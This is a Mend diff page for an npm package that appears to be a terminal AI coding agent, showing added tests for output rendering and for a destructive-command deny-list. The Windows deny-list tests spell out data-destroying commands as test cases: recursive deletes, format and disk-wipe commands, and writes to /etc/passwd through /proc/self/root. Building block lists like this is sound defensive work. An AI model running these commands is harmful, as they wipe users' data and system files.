npm - @semalt-ai/code - Versions diffs - 1.8.5 → 1.20.0 - Mend

@semalt-ai/code 1.8.5 → 1.20.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (192) hide show

package/.claude/settings.local.json +7 -1
package/.github/workflows/ci.yml +69 -0
package/ARCHITECTURE.md +6 -95
package/CLAUDE.md +196 -316
package/README.md +148 -4
package/docs/ARCHITECTURE.md +1321 -0
package/docs/CONFIG.md +340 -0
package/docs/HISTORY.md +245 -0
package/examples/embed.js +74 -0
package/index.js +251 -10
package/lib/agent.js +856 -120
package/lib/api.js +239 -50
package/lib/args.js +74 -2
package/lib/audit.js +23 -1
package/lib/background.js +584 -0
package/lib/checkpoints.js +757 -0
package/lib/commands/auth.js +94 -0
package/lib/commands/chat-session.js +489 -0
package/lib/commands/chat-slash.js +415 -0
package/lib/commands/chat-turn.js +669 -0
package/lib/commands/chat.js +407 -0
package/lib/commands/custom.js +157 -0
package/lib/commands/history-utils.js +66 -0
package/lib/commands/index.js +268 -0
package/lib/commands/mcp.js +113 -0
package/lib/commands/oneshot.js +193 -0
package/lib/commands/registry.js +269 -0
package/lib/commands/tasks.js +89 -0
package/lib/compact.js +87 -0
package/lib/config.js +360 -11
package/lib/constants.js +401 -3
package/lib/deny.js +199 -0
package/lib/doctor.js +160 -0
package/lib/headless.js +202 -0
package/lib/hooks.js +286 -0
package/lib/images.js +270 -0
package/lib/internals.js +49 -0
package/lib/mcp/boundary.js +131 -0
package/lib/mcp/client.js +270 -0
package/lib/mcp/oauth.js +134 -0
package/lib/memory.js +209 -0
package/lib/metrics.js +37 -2
package/lib/payload.js +54 -0
package/lib/permission-rules.js +401 -0
package/lib/permissions.js +123 -26
package/lib/pricing.js +67 -0
package/lib/proc.js +62 -0
package/lib/prompts.js +99 -8
package/lib/sandbox.js +568 -0
package/lib/sdk.js +328 -0
package/lib/secrets.js +211 -0
package/lib/skills.js +223 -0
package/lib/subagents.js +516 -0
package/lib/tool_registry.js +2862 -0
package/lib/tool_specs.js +263 -9
package/lib/tools.js +352 -1039
package/lib/ui/anim.js +86 -0
package/lib/ui/ansi.js +17 -27
package/lib/ui/chat-history.js +253 -71
package/lib/ui/create-ui.js +67 -24
package/lib/ui/diff.js +90 -25
package/lib/ui/file-activity.js +236 -0
package/lib/ui/format.js +195 -29
package/lib/ui/input-field.js +21 -11
package/lib/ui/md-stream.js +234 -0
package/lib/ui/render-operation.js +113 -0
package/lib/ui/select.js +1 -4
package/lib/ui/status-bar.js +146 -36
package/lib/ui/stream.js +20 -13
package/lib/ui/theme.js +190 -44
package/lib/ui/tool-operation.js +190 -0
package/lib/ui/utils.js +9 -5
package/lib/ui/web-activity.js +270 -0
package/lib/ui/writer.js +159 -45
package/lib/ui.js +1 -1
package/lib/verify.js +229 -0
package/lib/web-extract.js +213 -0
package/lib/web-summarize.js +68 -0
package/package.json +19 -4
package/scripts/lint.js +57 -0
package/test/agent-loop.test.js +389 -0
package/test/anim-driver.test.js +153 -0
package/test/ask-user-display.test.js +226 -0
package/test/ask-user-gate.test.js +231 -0
package/test/background.test.js +414 -0
package/test/chat-history-nocolor.test.js +155 -0
package/test/chat-relogin.test.js +207 -0
package/test/chat.test.js +114 -0
package/test/checkpoints-agent.test.js +181 -0
package/test/checkpoints.test.js +650 -0
package/test/command-registry.test.js +160 -0
package/test/compact.test.js +116 -0
package/test/completion-lazy.test.js +52 -0
package/test/config-merge.test.js +324 -0
package/test/config-quarantine.test.js +128 -0
package/test/config-write-guard-allow-anywhere.test.js +56 -0
package/test/config-write-guard-skip.test.js +46 -0
package/test/config-write-guard.test.js +153 -0
package/test/context-split.test.js +215 -0
package/test/cost-doctor.test.js +142 -0
package/test/custom-commands-chat.test.js +106 -0
package/test/custom-commands.test.js +230 -0
package/test/defer-detail-band.test.js +403 -0
package/test/deny-windows.test.js +120 -0
package/test/deny.test.js +83 -0
package/test/detail-band-tab-flatten.test.js +242 -0
package/test/download-allow-anywhere.test.js +66 -0
package/test/download-confine.test.js +153 -0
package/test/exec-diff.test.js +268 -0
package/test/executors.test.js +599 -0
package/test/extract-tool-calls.test.js +349 -0
package/test/fetch-url-validation.test.js +219 -0
package/test/file-activity.test.js +522 -0
package/test/fixtures/tool-calls.js +57 -0
package/test/fixtures/web-page.js +91 -0
package/test/git-tools.test.js +384 -0
package/test/grep-glob-serialize.test.js +242 -0
package/test/grep-glob.test.js +268 -0
package/test/grep-path-target.test.js +227 -0
package/test/harness/README.md +57 -0
package/test/harness/chat-harness.js +143 -0
package/test/harness/memwarn-headless-child.js +65 -0
package/test/harness/mock-llm.js +120 -0
package/test/harness/mock-mcp-server.js +142 -0
package/test/harness/sse-server.js +69 -0
package/test/headless.test.js +348 -0
package/test/history-utils.test.js +88 -0
package/test/hooks-agent.test.js +238 -0
package/test/hooks-verify-sandbox.test.js +232 -0
package/test/hooks.test.js +216 -0
package/test/http-get-user-agent.test.js +142 -0
package/test/images-api.test.js +208 -0
package/test/images.test.js +238 -0
package/test/input-field-ctrl-o.test.js +37 -0
package/test/live-height-physical.test.js +281 -0
package/test/max-iterations.test.js +218 -0
package/test/mcp-boundary.test.js +57 -0
package/test/mcp-client.test.js +267 -0
package/test/mcp-oauth.test.js +86 -0
package/test/md-stream.test.js +183 -0
package/test/memory-truncation-warning.test.js +222 -0
package/test/memory.test.js +198 -0
package/test/native-dispatch.test.js +409 -0
package/test/native-live-narration.test.js +254 -0
package/test/output-chokepoint.test.js +188 -0
package/test/output-heredoc-leak.test.js +195 -0
package/test/output-preview.test.js +245 -0
package/test/path-guards.test.js +134 -0
package/test/payload.test.js +99 -0
package/test/permission-rules-agent.test.js +210 -0
package/test/permission-rules.test.js +297 -0
package/test/permissions.test.js +362 -0
package/test/plan-mode.test.js +167 -0
package/test/read-paginate.test.js +275 -0
package/test/readonly-tools.test.js +177 -0
package/test/render-operation.test.js +317 -0
package/test/replay-descriptor-xml.test.js +216 -0
package/test/replay-descriptor.test.js +189 -0
package/test/replay-web-aggregate.test.js +291 -0
package/test/replay-web-persist.test.js +241 -0
package/test/result-cap.test.js +233 -0
package/test/running-glyph-anim.test.js +111 -0
package/test/sandbox-agent.test.js +147 -0
package/test/sandbox-integration.test.js +216 -0
package/test/sandbox.test.js +408 -0
package/test/sdk.test.js +234 -0
package/test/shell-output-cap.test.js +181 -0
package/test/skills-chat.test.js +110 -0
package/test/skills.test.js +295 -0
package/test/smoke.test.js +68 -0
package/test/status-bar-driver.test.js +93 -0
package/test/status-bar-pause.test.js +164 -0
package/test/status-bar-resync.test.js +188 -0
package/test/stream-parser.test.js +171 -0
package/test/subagents-agent.test.js +178 -0
package/test/subagents.test.js +222 -0
package/test/theme-palette.test.js +166 -0
package/test/tool-registry.test.js +85 -0
package/test/trim-budget.test.js +101 -0
package/test/truncate-visible.test.js +78 -0
package/test/verify-agent.test.js +317 -0
package/test/verify.test.js +141 -0
package/test/view-image.test.js +199 -0
package/test/web-activity-ordering.test.js +203 -0
package/test/web-activity.test.js +207 -0
package/test/web-data-extraction-guidance.test.js +71 -0
package/test/web-extract.test.js +185 -0
package/test/web-fetch-agent.test.js +291 -0
package/test/web-fetch-mode.test.js +193 -0
package/test/web-search.test.js +380 -0
package/lib/commands.js +0 -1438
package/path +0 -1

package/test/defer-detail-band.test.js ADDED Viewed

@@ -0,0 +1,403 @@
+'use strict';
+// Output Refactor · Phase 7b — defer-commit of the collapsed output preview.
+//
+// The most-recent output preview is held in the writer's redrawable detail band
+// until a turn boundary commits it ONCE (no scrollback churn). The preview is
+// static and collapsed — first N lines + a `… M more lines` hint, with no
+// interactive affordance (full viewing is deferred to the transcript viewer).
+//
+// These tests gate: (1) the collapsed commit is byte-identical to addMessage's
+// collapsed commit, (2) boundary commit + ordering at onToolStart / assistant
+// answer / turn-end, (3) resize-during-defer physical erase correctness, (4)
+// caret never coexists with the band, (5) diffs commit immediately (not
+// deferred), (6) the writer detail-region primitives + the 7a single-row
+// byte-identity still hold.
+const { test } = require('node:test');
+const assert = require('node:assert');
+process.stdout.isTTY = true;
+delete process.env.NO_COLOR;
+const { ChatHistory } = require('../lib/ui/chat-history');
+const writer = require('../lib/ui/writer');
+const stripAnsi = (s) => String(s).replace(/\x1b\[[0-9;?<>]*[a-zA-Z]/g, '');
+const mkLines = (n, prefix = 'line') => Array.from({ length: n }, (_, i) => `${prefix} ${i + 1}`).join('\n');
+// Capture chat-history's three output seams into ONE ordered log so we can
+// assert ordering across scrollback commits, band installs, and band commits.
+function instrument(ch) {
+  const log = [];
+  ch._commit = (t) => log.push({ op: 'scrollback', text: t });
+  ch._setDetail = (lines) => log.push({ op: 'setDetail', lines: lines.slice() });
+  ch._commitDetail = (t) => log.push({ op: 'commitDetail', text: t });
+  ch._notifyLive = () => {};
+  return log;
+}
+// ── 1. collapsed commit: byte-identical to addMessage, static hint, no affordance ─
+// The held band commits ONCE, byte-identical to addMessage's collapsed commit for
+// the same output. The hint carries no interactive `(ctrl+o)` affordance — full
+// viewing is deferred to the transcript viewer.
+test('collapsed commit: deferred commit == addMessage collapsed commit (byte-identical, static hint)', () => {
+  // Reference: what addMessage commits (immediate scrollback, collapsed, static).
+  const ref = new ChatHistory();
+  const refOut = [];
+  ref._commit = (t) => refOut.push(t);
+  ref._notifyLive = () => {};
+  ref.addMessage({ role: 'tool', tag: 'shell', content: '', output: mkLines(20), previewLines: 5 });
+  const expected = refOut.join('');
+  // Deferred: defer, commit at a boundary.
+  const ch = new ChatHistory();
+  const log = instrument(ch);
+  ch.deferToolOutput({ role: 'tool', tag: 'shell', content: '', output: mkLines(20), previewLines: 5 });
+  ch.commitDeferredDetail();
+  const commits = log.filter((e) => e.op === 'commitDetail');
+  assert.strictEqual(commits.length, 1, 'commits exactly once (no duplication)');
+  assert.strictEqual(commits[0].text, expected, 'collapsed commit is byte-identical to addMessage');
+  assert.doesNotMatch(stripAnsi(commits[0].text), /ctrl\+o/, 'committed collapsed hint carries no affordance');
+  assert.match(stripAnsi(commits[0].text), /… 15 more lines/, 'hidden count (20 − 5) preserved');
+});
+// ── 2. boundary commit + ordering (b: assistant answer text) ──────────────────
+// Guards: when the assistant answer streams, the held band commits BEFORE the
+// answer's first scrollback line (tool output stays above the answer).
+test('boundary (b): streamToken auto-commits the held band BEFORE the answer text', () => {
+  const ch = new ChatHistory();
+  const log = instrument(ch);
+  ch.deferToolOutput({ role: 'tool', tag: 'shell', content: '', output: mkLines(20), previewLines: 5 });
+  log.length = 0;
+  ch.streamToken('the answer\n');
+  const commitIdx = log.findIndex((e) => e.op === 'commitDetail');
+  const firstScrollIdx = log.findIndex((e) => e.op === 'scrollback');
+  assert.ok(commitIdx >= 0, 'band committed when the answer starts streaming');
+  assert.ok(firstScrollIdx >= 0, 'answer flows to scrollback');
+  assert.ok(commitIdx < firstScrollIdx, 'band commits BEFORE the answer text');
+});
+test('boundary (b): a non-streaming finalize also commits the band first', () => {
+  const ch = new ChatHistory();
+  const log = instrument(ch);
+  ch.deferToolOutput({ role: 'tool', tag: 'shell', content: '', output: mkLines(20), previewLines: 5 });
+  log.length = 0;
+  ch.finalizeLastMessage('final answer text'); // no stream → synthesises a bubble
+  const commitIdx = log.findIndex((e) => e.op === 'commitDetail');
+  const firstScrollIdx = log.findIndex((e) => e.op === 'scrollback');
+  assert.ok(commitIdx >= 0 && firstScrollIdx >= 0);
+  assert.ok(commitIdx < firstScrollIdx, 'band commits before the assistant bubble');
+});
+test('boundary: addMessage (e.g. a system line) auto-commits the held band first', () => {
+  const ch = new ChatHistory();
+  const log = instrument(ch);
+  ch.deferToolOutput({ role: 'tool', tag: 'shell', content: '', output: mkLines(20), previewLines: 5 });
+  log.length = 0;
+  ch.addMessage({ role: 'system', content: 'something happened' });
+  const commitIdx = log.findIndex((e) => e.op === 'commitDetail');
+  const firstScrollIdx = log.findIndex((e) => e.op === 'scrollback');
+  assert.ok(commitIdx < firstScrollIdx, 'band commits before the new bubble');
+});
+test('single slot: deferring a SECOND preview commits the first held one before installing', () => {
+  const ch = new ChatHistory();
+  const log = instrument(ch);
+  ch.deferToolOutput({ role: 'tool', tag: 'shell', content: '', output: mkLines(20), previewLines: 5 });
+  log.length = 0;
+  ch.deferToolOutput({ role: 'tool', tag: 'shell', content: '', output: mkLines(8, 'second'), previewLines: 5 });
+  const commitIdx = log.findIndex((e) => e.op === 'commitDetail');
+  const setIdx = log.findIndex((e) => e.op === 'setDetail');
+  assert.ok(commitIdx >= 0, 'first slot committed');
+  assert.ok(commitIdx < setIdx, 'first commits before the second band is installed (single slot)');
+});
+// ── 3b. boundary ordering through the REAL chat-turn callbacks (a + c + diff) ──
+// Drives the actual onToolStart/onToolEnd wiring with a stubbed runAgentLoop so
+// the three commit sites and the diff-immediacy are exercised end-to-end.
+function turnHarness() {
+  const { createTurnHandler } = require('../lib/commands/chat-turn');
+  const { TAG_REGISTRY } = require('../lib/constants');
+  const log = [];
+  // Shared writer stub + chat-history seams push into ONE ordered log.
+  const writerModule = {
+    startActivity: (id) => log.push({ op: 'startActivity', id }),
+    updateActivity: () => {},
+    endActivity: (id, line) => log.push({ op: 'endActivity', id, line }),
+    cancelActivity: () => {},
+    scrollback: (t) => log.push({ op: 'scrollback', text: t }),
+  };
+  const chatHistory = new ChatHistory();
+  chatHistory._commit = (t) => log.push({ op: 'scrollback', text: t });
+  chatHistory._setDetail = (lines) => log.push({ op: 'setDetail', lines: lines.slice() });
+  chatHistory._commitDetail = (t) => log.push({ op: 'commitDetail', text: t });
+  chatHistory._notifyLive = () => {};
+  const noop = () => {};
+  const statusBar = { update: noop, addPendingTokens: noop, updateMetrics: noop, setCost: noop };
+  const listeners = {};
+  const inputField = {
+    setDisabled: noop, releaseNavigation: noop,
+    on: (ev, cb) => { listeners[ev] = cb; },
+    removeListener: noop,
+  };
+  const ctx = {
+    inputField, statusBar, chatHistory,
+    getConfig: () => ({ auth_token: 'x', shell_preview_lines: 5, diff_max_lines: 100, max_iterations: 125, system_prompt_mode: 'system_role' }),
+    approxTokens: () => 1,
+    resolveCommand: () => null,
+    opts: {}, TAG_REGISTRY, writerModule,
+    collapseListMsg: noop, handlePendingSelection: noop, showPendingStep: noop,
+    activateNavCapture: noop, finalizeListMsg: noop,
+    createChatIfNeeded: async () => {}, saveTurnToDashboard: async () => {}, saveSession: noop,
+    messages: [], currentModel: 'm', resolvedSystemPrompt: '', planMode: false,
+    debugMode: false, pendingImages: [], resolvedTokenLimit: 100000,
+    runAgentLoop: null, // set per-test
+  };
+  const make = (drive) => {
+    ctx.runAgentLoop = async (messages, model, maxIter, limit, o) => {
+      await drive(o.callbacks);
+      return { messages, metrics: { turns: [] } };
+    };
+    return createTurnHandler(ctx, {});
+  };
+  return { log, make };
+}
+const SHELL_OUT = 'Command `ls`:\nExit code: 0\n' + mkLines(20);
+test('boundary (a): next op onToolStart commits the held band BEFORE its running line', async () => {
+  const { log, make } = turnHarness();
+  const handler = make(async (cb) => {
+    cb.onToolEnd('shell', SHELL_OUT, 10, { id: 't1', attrs: { command: 'ls' } });
+    cb.onToolStart('shell', 'cat f', { id: 't2', attrs: { command: 'cat f' } });
+    cb.onToolEnd('shell', 'Command `cat f`:\nExit code: 0\n', 5, { id: 't2', attrs: { command: 'cat f' } });
+  });
+  await handler('go');
+  const ops = log.map((e) => e.op);
+  const setIdx = ops.indexOf('setDetail');                       // t1 preview deferred
+  const commitIdx = ops.indexOf('commitDetail');                 // committed at t2 start
+  const startT2 = log.findIndex((e) => e.op === 'startActivity' && e.id === 't2');
+  assert.ok(setIdx >= 0, 't1 output deferred into the band');
+  assert.ok(commitIdx >= 0 && startT2 >= 0);
+  assert.ok(commitIdx < startT2, 'band commits before t2 running line');
+  // And after t1's result line (endActivity t1) — chronological order preserved.
+  const endT1 = log.findIndex((e) => e.op === 'endActivity' && e.id === 't1');
+  assert.ok(endT1 < setIdx, 't1 result line lands before its deferred preview');
+});
+test('boundary (c): a trailing op commits the held band at turn-end finally', async () => {
+  const { log, make } = turnHarness();
+  const handler = make(async (cb) => {
+    cb.onToolStart('shell', 'ls', { id: 't1', attrs: { command: 'ls' } });
+    cb.onToolEnd('shell', SHELL_OUT, 10, { id: 't1', attrs: { command: 'ls' } });
+    // turn ends with no following message/op → finally commits the band.
+  });
+  await handler('go');
+  const ops = log.map((e) => e.op);
+  assert.ok(ops.includes('setDetail'), 'trailing op deferred');
+  assert.ok(ops.includes('commitDetail'), 'trailing band committed at turn end');
+});
+test('diffs (6): a file-edit diff commits immediately to scrollback — not deferred, not toggleable', async () => {
+  const { log, make } = turnHarness();
+  const handler = make(async (cb) => {
+    cb.onToolEnd('write_file', 'Wrote 2 bytes to f', 5, {
+      id: 'd1', attrs: { path: 'f' }, diff: { before: mkLines(10, 'old'), after: mkLines(10, 'new'), path: 'f' },
+    });
+  });
+  await handler('go');
+  const ops = log.map((e) => e.op);
+  assert.ok(!ops.includes('setDetail'), 'a diff op never installs a detail band');
+  assert.ok(!ops.includes('commitDetail'), 'a diff op never uses the deferred-commit path');
+  // Result line (endActivity) + diff (scrollback) both committed immediately.
+  assert.ok(log.some((e) => e.op === 'endActivity' && e.id === 'd1'), 'result line committed');
+  assert.ok(log.some((e) => e.op === 'scrollback'), 'diff committed straight to scrollback');
+});
+// ── 4 + 7. writer detail-region primitives (byte capture) ─────────────────────
+// Guards: setDetail emits the band RAW (un-fitted, multi-row), at the top of the
+// live region, counted by physicalRows; commitDetail atomically erases the band
+// + appends to scrollback + redraws without it; resize recomputes the physical
+// erase (no stranded rows); single-row chrome stays byte-identical (7a).
+function withWriter(fn) {
+  const out = process.stdout;
+  const prev = { isTTY: out.isTTY, columns: out.columns, rows: out.rows, write: out.write };
+  let buf = '';
+  out.isTTY = true; out.columns = 80; out.rows = 24;
+  out.write = (s) => { buf += String(s); return true; };
+  const cap = { get: () => buf, reset: () => { buf = ''; }, setCols: (n) => { out.columns = n; } };
+  return (async () => {
+    try { await fn(cap); }
+    finally {
+      await writer.clearLive(); await writer.flush();
+      out.isTTY = prev.isTTY; out.columns = prev.columns; out.rows = prev.rows; out.write = prev.write;
+    }
+  })();
+}
+// Minimal ANSI terminal model (same vocabulary the writer emits) — rows.length
+// is the committed physical footprint; an undercounting erase makes it GROW.
+function makeVT() {
+  const rows = [''];
+  let r = 0, c = 0;
+  const ensure = (row) => { while (rows.length <= row) rows.push(''); };
+  const put = (ch) => { ensure(r); rows[r] = rows[r].slice(0, c) + ch + rows[r].slice(c + 1); c++; };
+  function write(s) {
+    let i = 0;
+    while (i < s.length) {
+      const ch = s[i];
+      if (ch === '\x1b' && s[i + 1] === '[') {
+        let j = i + 2, params = '';
+        while (j < s.length && /[0-9;?<>]/.test(s[j])) { params += s[j]; j++; }
+        const final = s[j]; const n = parseInt(params, 10) || 1;
+        if (final === 'A') r = Math.max(0, r - n);
+        else if (final === 'B') { r += n; ensure(r); }
+        else if (final === 'C') c += n;
+        else if (final === 'D') c = Math.max(0, c - n);
+        else if (final === 'J') { ensure(r); rows[r] = rows[r].slice(0, c); rows.length = r + 1; }
+        i = j + 1; continue;
+      }
+      if (ch === '\x1b') { i += 1; continue; }
+      if (ch === '\n') { r++; c = 0; ensure(r); i++; continue; }
+      if (ch === '\r') { c = 0; i++; continue; }
+      put(ch); i++;
+    }
+  }
+  return { rows, write };
+}
+test('writer.setDetail: band sits at the TOP of the live region, RAW (un-fitted)', () =>
+  withWriter(async (cap) => {
+    await writer.setLive(['separator', 'status', '› input']);
+    await writer.flush();
+    cap.reset();
+    await writer.setDetail(['detail row A', 'detail row B']);
+    await writer.flush();
+    // Band drawn ABOVE the chrome; height = 2 (band) + 3 (chrome) = 5 rows.
+    assert.strictEqual(writer.getLiveHeight(), 5);
+    const drawn = cap.get();
+    const aIdx = drawn.indexOf('detail row A');
+    const sepIdx = drawn.indexOf('separator');
+    assert.ok(aIdx >= 0 && sepIdx >= 0 && aIdx < sepIdx, 'detail band is emitted above the chrome');
+  }));
+test('writer.setDetail: a band line WIDER than cols is NOT fitted (held raw, wraps)', () =>
+  withWriter(async (cap) => {
+    cap.setCols(40);
+    const wide = 'D'.repeat(100); // 100 visible cols at width 40 → 3 physical rows
+    await writer.setDetail([wide]);
+    await writer.flush();
+    assert.ok(cap.get().includes(wide), 'the wide line is emitted verbatim (not truncated to cols-1)');
+    assert.strictEqual(writer.getLiveHeight(), 3, 'physicalRows counts the wrap (ceil(100/40))');
+  }));
+test('writer.commitDetail: atomically erases band + appends scrollback + redraws without band', () =>
+  withWriter(async (cap) => {
+    await writer.setLive(['chrome']);
+    await writer.setDetail(['det1', 'det2']);
+    await writer.flush();
+    assert.strictEqual(writer.getLiveHeight(), 3); // 2 detail + 1 chrome
+    cap.reset();
+    await writer.commitDetail('det1\ndet2\n');
+    await writer.flush();
+    // Erase 3 physical rows, append the committed band, redraw only the chrome.
+    assert.strictEqual(cap.get(), '\x1b[?25l\x1b[3A\r\x1b[Jdet1\ndet2\nchrome\n');
+    assert.deepStrictEqual(writer.getDetailLines(), [], 'band cleared after commit');
+    assert.strictEqual(writer.getLiveHeight(), 1, 'only chrome remains');
+  }));
+test('writer.commitDetail: no stranded rows after a resize NARROWER during the defer window', () => {
+  const vt = makeVT();
+  const out = process.stdout;
+  const prev = { isTTY: out.isTTY, columns: out.columns, rows: out.rows, write: out.write };
+  out.isTTY = true; out.columns = 80; out.rows = 24;
+  out.write = (s) => { vt.write(String(s)); return true; };
+  return (async () => {
+    try {
+      await writer.setLive(['chrome']);
+      // Band rendered at WIDE width (op-end width 80) — one row each, held verbatim.
+      const held = ['x'.repeat(70), 'y'.repeat(70)];
+      await writer.setDetail(held);
+      await writer.flush();
+      assert.strictEqual(writer.getLiveHeight(), 1 + 2); // 70<80 → 1 row each + chrome
+      // Resize NARROWER: each held 70-col line now wraps to 2 rows at width 40.
+      out.columns = 40;
+      await writer.redrawLive();
+      await writer.flush();
+      assert.strictEqual(writer.getLiveHeight(), 2 + 2 + 1, 'physical erase recomputes for the wrap');
+      const footprint = vt.rows.length;
+      // Commit at the narrow width — erases the recomputed physical height, no leak.
+      await writer.commitDetail(held.join('\n') + '\n');
+      await writer.flush();
+      // The held lines (op-end-width, NOT re-rendered) reached scrollback verbatim.
+      assert.ok(vt.rows.some((r) => r.startsWith('x'.repeat(40))), 'held line committed verbatim');
+      assert.ok(footprint > 0);
+    } finally {
+      await writer.clearLive(); await writer.flush();
+      out.isTTY = prev.isTTY; out.columns = prev.columns; out.rows = prev.rows; out.write = prev.write;
+    }
+  })();
+});
+test('7a unchanged: single-row chrome stays byte-identical with no band present', () =>
+  withWriter(async (cap) => {
+    await writer.setLive(['hi']);
+    await writer.flush();
+    assert.strictEqual(cap.get(), '\x1b[?25lhi\n', 'first draw, no band, no erase');
+    cap.reset();
+    await writer.setLive(['bye']);
+    await writer.flush();
+    assert.strictEqual(cap.get(), '\x1b[?25l\x1b[1A\r\x1b[Jbye\n', 'erase up=1, byte-identical to 7a');
+  }));
+// ── 5. caret — never coexists with the deferred band ──────────────────────────
+// Guards Step 0 verdict: input is disabled for the whole agent turn, so
+// getCaretPosition() is null while a band is held; the turn-end finally commits
+// the band BEFORE setDisabled(false). The InputField proves the disabled→null
+// caret contract that makes the create-ui caret math safe to leave untouched.
+test('caret: a disabled input field yields a null caret (band never coexists with a caret)', () => {
+  const { InputField } = require('../lib/ui/input-field');
+  const field = new InputField({ cols: 80 }, {}, () => {});
+  field.setDisabled(true);
+  assert.strictEqual(field.getCaretPosition(), null, 'disabled input has no caret while the band is held');
+  try { field.destroy(); } catch {}
+});
+// ── 8. collapsed-commit invariants (THIS task) ───────────────────────────────
+// The committed band carries no interactive affordance, and small
+// (non-truncatable) output commits byte-identically to addMessage.
+// (a) committed hint has NO "(ctrl+o)" affordance.
+test('committed hint carries no (ctrl+o) affordance', () => {
+  const ch = new ChatHistory();
+  const log = instrument(ch);
+  ch.deferToolOutput({ role: 'tool', tag: 'shell', content: '', output: mkLines(20), previewLines: 5 });
+  ch.commitDeferredDetail();
+  const text = stripAnsi(log.filter((e) => e.op === 'commitDetail')[0].text);
+  assert.match(text, /… 15 more lines/, 'hidden count remains on committed output');
+  assert.doesNotMatch(text, /ctrl\+o/, 'no interactive affordance once committed');
+});
+// (b) small (non-truncatable) output → committed band byte-identical to addMessage.
+test('small output: committed band byte-identical to addMessage (no affordance)', () => {
+  const ref = new ChatHistory();
+  const refOut = [];
+  ref._commit = (t) => refOut.push(t);
+  ref._notifyLive = () => {};
+  ref.addMessage({ role: 'tool', tag: 'shell', content: '', output: mkLines(3), previewLines: 5 });
+  const expected = refOut.join('');
+  const ch = new ChatHistory();
+  const log = instrument(ch);
+  ch.deferToolOutput({ role: 'tool', tag: 'shell', content: '', output: mkLines(3), previewLines: 5 });
+  ch.commitDeferredDetail();
+  const commits = log.filter((e) => e.op === 'commitDetail');
+  assert.strictEqual(commits[0].text, expected, 'small-output commit is byte-identical to addMessage');
+  assert.doesNotMatch(stripAnsi(commits[0].text), /ctrl\+o/, 'non-truncatable output never carries an affordance');
+});

package/test/deny-windows.test.js ADDED Viewed

@@ -0,0 +1,120 @@
+'use strict';
+// Unit tests for the Windows (cmd.exe / PowerShell) destructive deny-list set
+// and the procfs-root canonicalization added in Task 4.4. These run on ANY
+// platform — the deny-list is pattern-based, so the Windows coverage is testable
+// without Windows.
+const { test } = require('node:test');
+const assert = require('node:assert');
+const { checkShellDenylist, classifyShellCommand } = require('../lib/deny');
+// ---------------------------------------------------------------------------
+// Windows recursive delete
+// ---------------------------------------------------------------------------
+test('Windows recursive delete (del /s, rd /s, rmdir /s) is denied', () => {
+  const cases = [
+    'del /s /q C:\\Users\\me\\project',
+    'del /q /s data',
+    'del /f /s /q *.*',
+    'rd /s /q C:\\temp',
+    'rmdir /s /q build',
+    'RD /S C:\\Windows\\Temp',
+  ];
+  for (const cmd of cases) {
+    const r = checkShellDenylist(cmd);
+    assert.ok(r, `${cmd} should be denied`);
+    assert.match(r.label, /Windows recursive delete/);
+  }
+});
+test('plain del / rd without /s are allowed', () => {
+  for (const cmd of ['del stale.log', 'del /q one.txt', 'rd emptydir', 'rmdir olddir']) {
+    assert.strictEqual(checkShellDenylist(cmd), null, `${cmd} should be allowed`);
+  }
+});
+// ---------------------------------------------------------------------------
+// PowerShell recursive force delete
+// ---------------------------------------------------------------------------
+test('PowerShell Remove-Item -Recurse -Force is denied', () => {
+  const cases = [
+    'Remove-Item -Recurse -Force C:\\data',
+    'Remove-Item -Force -Recurse .\\node_modules',
+    'Remove-Item -Recurse -Force -Path C:\\x',
+  ];
+  for (const cmd of cases) {
+    const r = checkShellDenylist(cmd);
+    assert.ok(r, `${cmd} should be denied`);
+    assert.match(r.label, /PowerShell recursive force delete/);
+  }
+});
+test('Remove-Item without BOTH -Recurse and -Force is allowed', () => {
+  for (const cmd of ['Remove-Item one.txt', 'Remove-Item -Recurse logs', 'Remove-Item -Force single.tmp']) {
+    assert.strictEqual(checkShellDenylist(cmd), null, `${cmd} should be allowed`);
+  }
+});
+// ---------------------------------------------------------------------------
+// Windows format / disk wipe (catastrophic)
+// ---------------------------------------------------------------------------
+test('Windows format / disk-wipe set is denied AND flagged catastrophic', () => {
+  const cases = [
+    'format C: /fs:ntfs',
+    'format D:',
+    'Format-Volume -DriveLetter D',
+    'Clear-Disk -Number 0 -RemoveData',
+    'cipher /w:C',
+    'diskpart /s script.txt clean',
+  ];
+  for (const cmd of cases) {
+    const r = checkShellDenylist(cmd);
+    assert.ok(r, `${cmd} should be denied`);
+    assert.strictEqual(r.catastrophic, true, `${cmd} should be catastrophic`);
+  }
+});
+test('benign uses of similar words are not caught', () => {
+  for (const cmd of ['git format-patch -1', 'npm run format', 'echo format the report']) {
+    assert.strictEqual(checkShellDenylist(cmd), null, `${cmd} should be allowed`);
+  }
+});
+// ---------------------------------------------------------------------------
+// classifyShellCommand integration — Windows catastrophic gets the typo guard
+// ---------------------------------------------------------------------------
+test('user-initiated Windows format asks for confirmation (catastrophic typo guard)', () => {
+  assert.strictEqual(classifyShellCommand('format C:', 'user').action, 'confirm');
+  // del /s is destructive but not catastrophic → user keeps the bypass.
+  assert.strictEqual(classifyShellCommand('del /s /q C:\\x', 'user').action, 'allow');
+  // agent-initiated → hard block for both.
+  assert.strictEqual(classifyShellCommand('format C:', 'agent').action, 'block');
+  assert.strictEqual(classifyShellCommand('del /s /q C:\\x', 'agent').action, 'block');
+});
+// ---------------------------------------------------------------------------
+// procfs-root canonicalization (constraint #3)
+// ---------------------------------------------------------------------------
+test('/proc/self/root path-rewrite is canonicalized so /etc matchers still fire', () => {
+  // The textual path dodges a naive /etc matcher; canonicalization rewrites the
+  // procfs-root prefix back to / so the existing system-path rule catches it.
+  const r = checkShellDenylist('echo pwned > /proc/self/root/etc/passwd');
+  assert.ok(r, 'write via /proc/self/root/etc must be denied');
+  assert.match(r.label, /system/i);
+});
+test('/proc/<pid>/root rewrite is canonicalized too', () => {
+  const r = checkShellDenylist('tee /proc/1234/root/etc/cron.d/x');
+  assert.ok(r, 'write via /proc/<pid>/root/etc must be denied');
+});
+test('a benign /proc read is still allowed', () => {
+  assert.strictEqual(checkShellDenylist('cat /proc/self/status'), null);
+});

package/test/deny.test.js ADDED Viewed

@@ -0,0 +1,83 @@
+'use strict';
+// Unit tests for the destructive-command deny-list and the agent-vs-user
+// initiator distinction added in Task 1.0. Uses the built-in node:test runner.
+const { test } = require('node:test');
+const assert = require('node:assert');
+const { checkShellDenylist, classifyShellCommand } = require('../lib/deny');
+// ---------------------------------------------------------------------------
+// checkShellDenylist — raw match + catastrophic flag
+// ---------------------------------------------------------------------------
